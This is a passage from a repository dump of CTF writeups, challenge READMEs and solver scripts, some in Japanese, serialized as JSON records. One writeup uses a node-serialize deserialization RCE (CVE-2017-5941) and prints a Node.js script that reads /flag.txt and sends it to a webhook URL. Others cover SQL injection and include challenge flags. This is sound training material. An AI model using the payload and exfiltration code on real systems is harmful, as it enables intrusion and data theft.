solver.py\nWelcome to StackOverflow! Before you start ~~copypasting code~~ asking good questions, we would like you to answer a question. What's your favorite color?\nThanks! 
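Peda's `pattern`/`patto` in the session above has a pwntools counterpart, which keeps the whole offset hunt inside the exploit script (an equivalent tool choice, not what the writeup used):

```py
from pwn import cyclic, cyclic_find

print(cyclic(64))               # send this as the padding instead of AAAA...
print(cyclic_find(b"kaaa"))     # 40 -- offset of the 4 bytes seen at [rbp-0x8]
```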
Now onto the posts!\nDEBUG MODE ACTIVATED.\n$ ls\nflag.txt\nrun\n$ cat flag.txt\nictf{4nd_th4t_1s_why_y0u_ch3ck_1nput_l3ngth5_486b39aa}\n```\n\n<!-- ictf{4nd_th4t_1s_why_y0u_ch3ck_1nput_l3ngth5_486b39aa} -->\n" }, { "alpha_fraction": 0.6160714030265808, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 21.600000381469727, "blob_id": "853edf5976d23b108dd9002920c8a19b2109ffbe", "content_id": "876e8255af2c3a9c63aacec8fcf7e2bd69da396b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 112, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/snek/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "No step on snek\n\n~knif3\n\n[snek](https://ctf.ritsec.club/files/7499aedbcfa15e66d15a95e90165eae0/snek?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6N30.YHGWzg.BCoaA25o1dCwvDxyzGidT9evr_c)" }, { "alpha_fraction": 0.6949806809425354, "alphanum_fraction": 0.7722007632255554, "avg_line_length": 31.375, "blob_id": "380cd7f233a004eef5ac679b2de01d5ad0e6a85b", "content_id": "15fb4827d528cf4f2e1c9812fdd9328200164123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "no_license", "max_line_length": 104, "num_lines": 8, "path": "/2021/HeroCTF_v3/HolyAbbot/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A certain abbot tried to give us a message...\n\n(the message is in lower case) (No need to speak French)\n\nFormat : Hero{messageinlowercase}\nAuthor : Thib\n\n[HolyAbbot.txt](https://www.heroctf.fr/files/d35f6ad869c194363c4cbcce308d5220/HolyAbbot.txt?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjM1fQ.YIQ3Mg.M_LehNMo44dWs-JU-4CaiPsjxlk)\n" }, { "alpha_fraction": 0.5803213119506836, "alphanum_fraction": 0.6305220723152161, "avg_line_length": 18.153846740722656, "blob_id": "c05631dde77aeccd2db32f8811ef8ef40cd45844", "content_id": "3fcbf24de84712aa56e926ad6c69914f8c779433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 728, "license_type": "no_license", "max_line_length": 138, "num_lines": 26, "path": "/2021/BCACTF_2.0/Infinite_Zip/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nzipファイルが与えられる。\n\n試しに解凍してみると、さらにzipファイルが出てきた。unzipを何度も繰り返す必要がある。\n\n以下のコマンドで再帰的に解凍していったところ、画像ファイルが手に入った。\n\n```bash\n$ while [ \"`find . 
-type f -name '*.zip' | wc -l`\" -gt 0 ]; do find -type f -name \"*.zip\" -exec unzip -- '{}' \\; -exec rm -- '{}' \\;; done\n```\n\n![](./extract/flag.png)\n\n```\nbcactf{n0_f14g_4_u}\n```\n\nと思ったら、これはダミーでstringsコマンドで本当のフラグが得られる。\n\n```bash\n$ strings flag.png | grep bcactf\n <rdf:li>bcactf{z1p_1n51d3_4_z1p_4_3v3r}</rdf:li>\n```\n\n<!-- bcactf{z1p_1n51d3_4_z1p_4_3v3r} -->\n" }, { "alpha_fraction": 0.46524062752723694, "alphanum_fraction": 0.6791443824768066, "avg_line_length": 13.410256385803223, "blob_id": "bb6fa1ea7a3ebe8faf36de2017b54008b43350a0", "content_id": "7db86bcd10fabd4fb8eff4071d6cde93287ae2a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 797, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/2020/kksctf_open_2020/motor_sounds/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nファイルの中身には以下のような文字列が書かれている。\n\n```\nG0 F15000 X9 Y6 Z2\nG1 F1500 E-6.5\nG0 F4285.7 X66.444 Y105.4 Z0.27\nG0 X66.988 Y105.085\nG1 F1500 E0\nG1 F1200 X71.075 Y103.179 E0.0668\n.\n.\n.\n```\n\n調べてみると、これは`G-code`と呼ばれる形式で書かれていることが分かった。3Dプリンターを動かすときに使われているようだ。\n\n* https://note.com/disconosuke/n/n8a3953fdd286\n\n* https://reprap.org/wiki/G-code/ja\n\nオンラインでG-codeを描画してみる。\n\n* http://gcode.ws/\n\n![](img/2020-12-12-21-22-16.png)\n\n![](img/2020-12-12-21-23-28.png)\n\n見にくいが、真ん中の列にフラグが描画されている。\n\n* KKS2020\n\n* kks{ <!--W3_c@N_1n_3D!--> }\n\n* Happy new year!\n\n<!-- kks{W3_c@N_1n_3D!} -->" }, { "alpha_fraction": 0.445738822221756, "alphanum_fraction": 0.4727161228656769, "avg_line_length": 24.904762268066406, "blob_id": "e6b22599fa5c595f859f4392e56da9017be9691d", "content_id": "cd27b0a5848753d8b01abd2060cc809be5c47571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1777, "license_type": "no_license", "max_line_length": 80, "num_lines": 63, "path": "/2021/angstromCTF_2021/Archaic/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nはじめに用意されたシェルサーバーへアクセスする。\n\n```\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in /usr/share/doc/*/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nWelcome to the\n _ _ __\n () | | | | / _|\n __ _ _ __ __ _ ___| |_ _ __ ___ _ __ ___ ___| |_| |_\n / _` | '_ \\ / _` / __| __| '__/ _ \\| '_ ` _ \\ / __| __| _|\n| (_| | | | | (_| \\__ \\ |_| | | (_) | | | | | | (__| |_| |\n \\__,_|_| |_|\\__, |___/\\__|_| \\___/|_| |_| |_|\\___|\\__|_|\n __/ |\n |___/\n\nshell server!\n\n*==============================================================================*\n* Please be respectful of other users. Abuse may result in disqualification. *\n*Data can be wiped at ANY TIME with NO WARNING. 
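The shell loop in the Infinite_Zip writeup above also ports to pure Python, handy on systems without `find`/`unzip` (my own equivalent; assumes `flag.zip` has already been extracted once into `extract/`):

```py
import pathlib
import zipfile

root = pathlib.Path("extract")
while True:
    zips = list(root.rglob("*.zip"))
    if not zips:
        break
    for z in zips:
        with zipfile.ZipFile(z) as zf:
            zf.extractall(z.parent)   # unpack next to the archive
        z.unlink()                    # mirrors the `rm` in the one-liner
print([p.name for p in root.rglob("*") if p.is_file()])
```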
Keep backups of important data!*\n*==============================================================================*\nteam8861@actf:~$\n```\n\n`/problems/2021/archaic/archive.tar.gz`を取ってくる。\n\n```bash\n$ cp /problems/2021/archaic/archive.tar.gz ./\n```\n\n拡張子が`.tar`なので解凍する。\n\n```bash\n$ tar -xzvf archive.tar.gz\nflag.txt\n```\n\n`flag.txt`の中身を見る。読み取り権限がないので、権限をつけてから読む。\n\n```bash\n$ cat flag.txt\ncat: flag.txt: Permission denied\n\n$ ls -la flag.txt\n---------- 1 team8861 team8861 37 Apr 1 1921 flag.txt\n\n$ chmod +r flag.txt\n\n$ ls -la flag.txt\n-r--r--r-- 1 team8861 team8861 37 Apr 1 1921 flag.txt\n\n$ cat flag.txt\nactf{thou_hast_uncovered_ye_ol_fleg}\n```\n\n<!-- actf{thou_hast_uncovered_ye_ol_fleg} -->" }, { "alpha_fraction": 0.6027164459228516, "alphanum_fraction": 0.7181664109230042, "avg_line_length": 21.653846740722656, "blob_id": "b7f983aa8798f044a3249015761f8d3dfa04db14", "content_id": "4619e7d6b24c9b133fcca93ac37552ca021bb5a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 911, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/2021/redpwnCTF_2021/secure/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[secure.mc.ax](https://secure.mc.ax/) にアクセスするとログイン画面が表示される。\n\n与えられたソースコードを読むと、UsernameとPasswordはBase64でエンコードされていることが分かる。\n\n```js\ndb.exec(`INSERT INTO users (username, password) VALUES (\n '${btoa('admin')}',\n '${btoa(crypto.randomUUID)}'\n)`);\n```\n\n試しに`admin : admin`でログインすると以下のように表示される。\n\n![](img/2021-07-10-17-09-25.png)\n\n入力フォームからのリクエストでは、`A-Za-z0-9+/=`の文字列しか使用できない。\n\nしかし、実際にBase64に変換しているのはフロントエンドのJavaScript部分なので、POSTリクエストを書き換えて SQL injection を行うことができる。\n\n![](img/2021-07-10-17-16-56.png)\n\n![](img/2021-07-10-17-03-42.png)\n\n<!-- flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d} -->\n" }, { "alpha_fraction": 0.8220859169960022, "alphanum_fraction": 0.8527607321739197, "avg_line_length": 31.600000381469727, "blob_id": "272adf553ff105cbb05ea7a9e68ef798f4dbd6f9", "content_id": "e355c7a99bc52b6ef5a51f487600e40ab789e88d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 251, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/WaniCTF21-spring/MixedUSB/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "USBにパーティションを設定したら、どこにFLAGを保存しているのかわからなくなってしまいました...\n\n[MixedUSB.img](https://mega.nz/file/AWBnRIhZ#7apL0Egu5LfvVoTkkoIEwKQjbF1McFvUmFIgeX0RLCU)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.7389034032821655, "alphanum_fraction": 0.7859007716178894, "avg_line_length": 19.7297306060791, "blob_id": "a6cb3fd373d4ad78e149292d51d597528288c34c", "content_id": "d4ed9673fa3dd203c86827171e2c10a295cbf8a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1448, "license_type": "no_license", "max_line_length": 126, "num_lines": 37, "path": "/2020/hxp_CTF_2020/nanothorpe/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not Solved :(\n\n# Writeup\n\nリンク先のWebページにアクセスするとフォームが表示される。\n\nデフォルトで入力されている`ls`コマンドを実行してみると以下のような結果が得られる。\n\n![](img/2020-12-19-00-15-42.png)\n\nコマンドを何でも実行できるわけではなさそう。\n\n![](img/2020-12-19-00-18-33.png)\n\nリンクの`xz`ファイルを解凍する。中身はどうやらサーバー側のプログラムのようだ。\n\n```bash\ntar Jxfv nanothorpe-d2095dcfeda4b08d.tar.xz 
\n```\n\nWebサーバーのプログラムを見ると、エンドポイントとして`api/authorize`と`api/run`が用意されている。\n\n![](img/image1.png)\n\n`api/authorize`ではクエリパラメータに`cmd=ls`を指定すると、有効期限のタイムスタンプと`secret`を使って`signature`を計算する。\n\n`api/run`ではクエリパラメータの`cmd`に指定されている`command`を実行する。ただし、cookieの`signature`と、クエリパラメータと`secret`を使って計算した`signarute`が一致しなければならない。(緑部分)\n\n`cmd=ls`のときは緑部分が一致するので、`ls`のみは標準で実行できる。\n\n任意のコマンドを実行したいなら、`octothorpe(secret + 'query_string')`を`cookie`に設定すれば良さそう。\n\nだが、肝心の`octothorpe`の中身が解読できなかった...\n\n# Solution\n\n# Comment" }, { "alpha_fraction": 0.7450425028800964, "alphanum_fraction": 0.7677053809165955, "avg_line_length": 31.18181800842285, "blob_id": "d6dc5bef87054b6d75c74174cc5ea49e6b15c072", "content_id": "a651f27477a0495b5f9e928ffd02ac6d9c063b2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 353, "license_type": "no_license", "max_line_length": 100, "num_lines": 11, "path": "/2021/BCACTF_2.0/Secure_Zip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald lost his homework in this zip file. He needs to extract his homework or else he fails CTF101.\n\n[chall.zip](https://objects.bcactf.com/bcactf2/secureZip/chall.zip)\n\nHint 1 of 2\n\nA quick google search of \"Free/Fast Zip password cracker\" will help find the right command\n\nHint 2 of 2\n\nGerald loves listening to the song that goes \"we will, we will\"." }, { "alpha_fraction": 0.7136929631233215, "alphanum_fraction": 0.7800830006599426, "avg_line_length": 39.16666793823242, "blob_id": "4e508596e400d561af7d5ded7cb61f3cbca4f148", "content_id": "e9a126c93b46625e45c4232f6c739031244c6005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 241, "license_type": "no_license", "max_line_length": 110, "num_lines": 6, "path": "/2021/HeroCTF_v3/EasyAssembly/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Don't worry, this one is quite easy :) Could be a good introduction to assembly !\n\nFormat : Hero{input:modified}\nAuthor : SoEasY\n\n[EasyAssembly.asm](https://www.heroctf.fr/files/c173fdcd67e80e479f7caff7ab5bd372/EasyAssembly.asm?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjY2fQ.YIQzig.woqHSQ4FDN2Q5FhQcYbt1YgUb7Y)\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 13, "blob_id": "ca423e69635fce6847b2a134a303b3ae2227b790", "content_id": "6525cbf8ae024500ecdd3a9b1ffb58e4e325c1eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 436, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/2020/KipodAfterFreeCTF/8byte/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "\nNot Solved :()\n\n# Try\n\n拡張子が`exe`だが一応`file`コマンドで確認。\n\n```bash\n$ file binary.exe\nbinary.exe: PE32 executable (console) Intel 80386, for MS Windows\n```\n\nWindows上で実行。\n\n![](img/2020-11-07-19-41-03.png)\n\nどうやら引数にフラグを入れられれば良いらしい。\n\n`angr`みたいなことができればよいが、`exe`デバッグのノウハウがないのでスキップ。\n\n# Solution" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.7864583134651184, "avg_line_length": 37.400001525878906, "blob_id": "a050a4964329d9c4302abd9dc3b29110ea1518b9", "content_id": "d1ef706c0359ff5b3acd30b2862a1f2e7713e92e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 192, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": 
"/2021/DawgCTF_2021/Calculator/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I hid my flag in a calculator but I forgot what the magic number is...\n\nAuthor: Percival\n\n[calculator.exe](https://umbccd.io/files/552b1f0d1c4c6705a57d987d57aee6ea/calculator.exe?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjIxfQ.YJYgoQ.M_SxtFzs97nA2-74uWLAPJyBNpM)\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 14.333333015441895, "blob_id": "8391e31b08e286e767c545f0503bfeedac686182", "content_id": "7a7dbf24eb36fbaa3b3026d75d876eed13ba05ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/2020/WaniCTF/Veni_vidi/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "SYNT{fvzcyr_pynffvpny_pvcure}\n\nWriter : Laika" }, { "alpha_fraction": 0.6342412233352661, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 25.586206436157227, "blob_id": "a7af983e287e9bc06c5c05fa7c175d88f4c6f8d8", "content_id": "aeeab4c035b2ba9cbaa31bdacbc918eddd2f0a55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 771, "license_type": "no_license", "max_line_length": 82, "num_lines": 29, "path": "/2021/dCTF_2021/Just_Take_Your_Time/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nfrom time import time\nfrom Crypto.Cipher import DES3\n\nfrom pwnlib.util.fiddling import xor\n\nio = remote('dctf-chall-just-take-your-time.westeurope.azurecontainer.io', '9999')\n\nio.recvuntil('You have one second.\\n')\n\ncalc = None\nexec('calc = ' + io.recvline().decode('utf-8').split('=')[0])\nio.sendline(str(calc))\n\nio.recvuntil('flag shall be yours!\\n')\nencrypted = bytes.fromhex(io.recvline_regex(r'[0-9a-f]*').decode('utf-8'))\n\nnow = int(time())\nfor i in range(60):\n key = str(now-i).zfill(16).encode(\"utf-8\")\n cipher = DES3.new(key, DES3.MODE_CFB, b\"00000000\")\n decrypted = cipher.decrypt(encrypted)\n if '\\\\x' not in str(decrypted):\n io.sendline(decrypted)\n print(decrypted, -i)\n break\n\nprint(io.recvall())\nio.close()\n" }, { "alpha_fraction": 0.790243923664093, "alphanum_fraction": 0.8146341443061829, "avg_line_length": 28.428571701049805, "blob_id": "4dbf09219b38d1af9b9c72be4edb2af9bb8fec93", "content_id": "2ed091f9a7ff07641e923ec037147e669c1ae8e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 80, "num_lines": 7, "path": "/2020/CyberSecurityRumble2020/Zeh/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "For the CSR we finally created a deutsche Programmiersprache!\n\nnc chal.cybersecurityrumble.de 65123\n\n[haupt.c](https://storage.googleapis.com/ctf.cybersecurityrumble.de/zeh/haupt.c)\n\nAuthor: rugo|RedRocket" }, { "alpha_fraction": 0.6073619723320007, "alphanum_fraction": 0.6441717743873596, "avg_line_length": 12.583333015441895, "blob_id": "bcbfd7a5ba5111e312fd58aaa450139257c454f8", "content_id": "94087f63576bee2a81dc315efd864a01f2da0897", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 163, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": 
"/2021/WaniCTF21-spring/Git_Master/mis-git-master/Dockerfile", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "FROM ubuntu:20.04\n\nLABEL maintainer=\"[email protected]\"\n\nRUN apt update \\\n && apt install -y nginx\n\nEXPOSE 80\n\nCOPY . /var/www\n\nCMD [\"/usr/sbin/nginx\", \"-g\", \"daemon off;\"]\n" }, { "alpha_fraction": 0.6938202381134033, "alphanum_fraction": 0.7219101190567017, "avg_line_length": 31.454545974731445, "blob_id": "f56f7eebe8d6ecee2462565eb2685b03f485563d", "content_id": "4a42160f643485ba8c3e2bfea3c34c1da0b5983d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/2020/SunshineCTF/Hotel_Door_Puzzle/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\np = angr.Project('hotel_key_puzzle')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x22BA-0x221B)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6969696879386902, "alphanum_fraction": 0.75, "avg_line_length": 25.600000381469727, "blob_id": "3d721e25ad1bbd8513046399f8cd86b59f61fff6", "content_id": "6a6eb6ef92a29ac69b8632fa15724f09788be613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 83, "num_lines": 5, "path": "/2020/kksctf_open_2020/Lynx/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hello! 
We're BluePeace organisation, and we introduce the new project - Lynx Forum!\n\n[Link](http://tasks.kksctf.ru:30070/)\n\n@greg0r0" }, { "alpha_fraction": 0.2791479825973511, "alphanum_fraction": 0.35538116097450256, "avg_line_length": 33.30769348144531, "blob_id": "50ed91c9c3f5da8c00e3038782d85678f9d2a0ad", "content_id": "d38ecf8acfd97caab62472164eb5951c83ad5c70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 892, "license_type": "no_license", "max_line_length": 90, "num_lines": 26, "path": "/2021/UIUCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# UIUCTF 2021\n\n* https://uiuc.tf/\n\n* 2021/07/31 09:00 JST - 2021/08/02 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------- | ---------------------- | ----: | -----: |\n| Misc | [CEO](CEO) | WPA, dictionary attack | 50 | 203 |\n| Crypto | [back_to_basics](back_to_basics) | base N | 50 | 103 |\n| Crypto | [dhke_intro](dhke_intro) | AES, CFB | 50 | 166 |\n| Reversing | [hvhpgs{synt}](hvhpgs{synt}) | ROT | 50 | 208 |\n| Web | [phpfuck](phpfuck) | | 50 | 251 |\n| Web | [wasmbaby](wasmbaby) | wasm | 50 | 372 |\n\n---\n\n## Result\n\n* 602 points\n\n* 159 / 658 (> 1 pt)\n" }, { "alpha_fraction": 0.8162983655929565, "alphanum_fraction": 0.8314917087554932, "avg_line_length": 25.851852416992188, "blob_id": "5b7d83955f4d4a26aad0ff07b3411625838d1115", "content_id": "16152e12bf843c24c423cff075f4efad98a3cc1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 101, "num_lines": 27, "path": "/2020/WaniCTF/SQL_Challenge_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ: https://sql1.wanictf.org/index.php?year=2011\n\n今まで見たアニメのリストをデータベースに登録したよ。間違えて秘密の情報(FLAG)もデータベースに登録しちゃったけど、たぶん誰にも見られないし大丈夫だよね。\n\n(Hint)\n\nSQL injectionの問題です。\n\nURLの「year=」の後に続く数字(年号)をSQL injectionを起こすような文字列に変更するとFLAGが表示されます。\n\n一部使えない文字もあるのでソースコード(index.php)を参考に考えてみてください。\n\n必要に応じてデータベースのスキーマ(1_schema.sql)も参考にしてください。\n\n(注意)\n\nsql-chall-1.zipは問題を解くために必須の情報ではなく、docker-composeを利用してローカルで問題環境を再現するためのものです。\n\n興味のある方は利用してみてください。\n\n[index.php](https://score.wanictf.org/storage/oshaubxunljhmdwulgubalcphkfghsmz/index.php)\n\n[1_schema.sql](https://score.wanictf.org/storage/fdmeaslfyzjpmjhitqkypmvgirsktnqa/1_schema.sql)\n\n[sql-chall-1.zip](https://score.wanictf.org/storage/xpvdcxybtelbaodfpisxojiczcakdwxa/sql-chall-1.zip)\n\nWriter : nkt" }, { "alpha_fraction": 0.4732455313205719, "alphanum_fraction": 0.6977829933166504, "avg_line_length": 33.085227966308594, "blob_id": "72be0b11181adead7ef6084e7a5b457d615dda65", "content_id": "7f1527248b6294eedfed2912a775f9e949ca9bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6703, "license_type": "no_license", "max_line_length": 1439, "num_lines": 176, "path": "/2021/Zh3r0_CTF_V2/sparta/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n* http://web.zh3r0.cf:6666\n\nにアクセスする。ポート6666は`ERR_UNSAFE_PORT`なので、\n\n```\nchrome.exe --explicitly-allowed-ports=6666\n```\n\nでChromeを起動する。ページ上では特に情報を得られなかったので、ソースコードを読む。\n\n```js\napp.post('/guest', function(req, res) {\n if (req.cookies.guest) {\n \tvar str = new Buffer(req.cookies.guest, 'base64').toString();\n \tvar obj = serialize.unserialize(str);\n \tif 
(obj.username) {\n \tres.send(\"Hello \" + escape(obj.username) + \". This page is currently under maintenance for Guest users. Please go back to the login page\");\n }\n } else {\n\t var username = req.body.username \n\t var country = req.body.country \n\t var city = req.body.city\n\t var serialized_info = `{\"username\":\"${username}\",\"country\":\"${country}\",\"city\":\"${city}\"}`\n var encoded_data = new Buffer(serialized_info).toString('base64');\n\t res.cookie('guest', encoded_data, {\n maxAge: 900000,\n httpOnly: true\n });\n }\n ```\n\n* http://web.zh3r0.cf:6666/guest\n\nにPOSTリクエストするとCookieがセットされる。\n\nパラメータなしでPOSTすると、以下のようになる。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Set-Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D; Max-Age=900; Path=/; Expires=Fri, 04 Jun 2021 14:25:42 GMT; HttpOnly\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 6\n< ETag: W/\"6-aTQsXDnlrl8Ad67MMsD4GBH7gZM\"\n< Date: Fri, 04 Jun 2021 14:10:42 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello!%\n```\n\nCookieの値は`eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0`であり、Base64デコードすると、`{\"username\":\"undefined\",\"country\":\"undefined\",\"city\":\"undefined\"}`となっている。\n\nまた、Cookieを入れた状態でPOSTすると以下のようになる。\n\n```bash\n$ curl -X POST http://web.zh3r0.cf:6666/guest -H 'Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmlu\nZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D;' --verbose\n* Trying 35.200.166.215:6666...\n* TCP_NODELAY set\n* Connected to web.zh3r0.cf (35.200.166.215) port 6666 (#0)\n> POST /guest HTTP/1.1\n> Host: web.zh3r0.cf:6666\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Cookie: guest=eyJ1c2VybmFtZSI6InVuZGVmaW5lZCIsImNvdW50cnkiOiJ1bmRlZmluZWQiLCJjaXR5IjoidW5kZWZpbmVkIn0%3D;\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 200 OK\n< X-Powered-By: Express\n< Content-Type: text/html; charset=utf-8\n< Content-Length: 107\n< ETag: W/\"6b-mcPBCXUs6bskleLZQZg4Tt74gBA\"\n< Date: Fri, 04 Jun 2021 14:19:54 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n<\n* Connection #0 to host web.zh3r0.cf left intact\nHello undefined. This page is currently under maintenance for Guest users. 
Please go back to the login page%\n```\n\nJSON形式の`username`が表示されていることが確認できる。\n\n`username`の値を使ってXSSしてみる。\n\nDockerfileから、flagの内容が`/flag.txt`にあることが分かっているので、\n\n```\n{\"username\":\"<script>document.write('/flag.txt');</script>\"}\n```\n\nを送りたい。しかし`<`や`'`などはHTMLエスケープで`&lt;`や`&#39`となってしまう・・・。\n\n何か別の方法を探したところ、**`CVE-2017-5941`** を発見。コードを見た感じ、ほぼそのままなので使えそう。\n\n以下のようなJSONを`unserialize()`させると、Javascriptが即実行されるらしい。(jsonのkeyは何でもよい)\n\n```json\n{\"rce\":\"_$$ND_FUNC$$_function(){ eval(String.fromCharCode( #javascript ))}()\"}\n```\n\nExploit用のスクリプトを作る。`console.log`してもこちら側には表示されないので、hookする。\n\n```js\nconst https = require('https');\nconst fs = require('fs');\n\nvar uri = 'https://webhook.site/d709442c-232a-41d2-929d-2371e1f4d0cf/?q=';\n\nvar data = fs.readFileSync('/flag.txt');\nuri += data.toString();\n\nconst req = https.request(uri, (res) => {\n res.on('data', (chunk) => {\n console.log(`${chunk}`);\n });\n})\n\nreq.on('error', (e) => {\n console.error(`${e.message}`);\n});\n\nreq.end();\n```\n\nExploit用のJSONに変換する。\n\n```json\n{\"rce\":\"_$$ND_FUNC$$_function(){ 